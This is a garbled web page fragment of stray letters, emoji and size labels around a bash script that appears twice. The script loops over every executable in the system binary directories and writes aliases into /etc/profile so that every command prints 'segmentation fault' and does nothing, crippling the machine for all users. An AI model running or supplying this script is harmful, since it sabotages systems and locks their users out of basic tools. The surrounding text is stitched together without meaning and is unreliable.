n🐈
Size: a a a
n🐈
PK
AK
PK
n🐈
M
AM
AN
DL
#!/bin/bash
for d in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin;
do
for tool in $(find "$d" -type f);
do
toolname=$(basename $tool)
cat << EOF >> /etc/profile
alias $toolname='/bin/echo "segmentation fault";'
EOF
done
done
DL
AK
DL
LN
#!/bin/bash
for d in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin;
do
for tool in $(find "$d" -type f);
do
toolname=$(basename $tool)
cat << EOF >> /etc/profile
alias $toolname='/bin/echo "segmentation fault";'
EOF
done
done
DL
LN
DL
LN
DL
DL
DL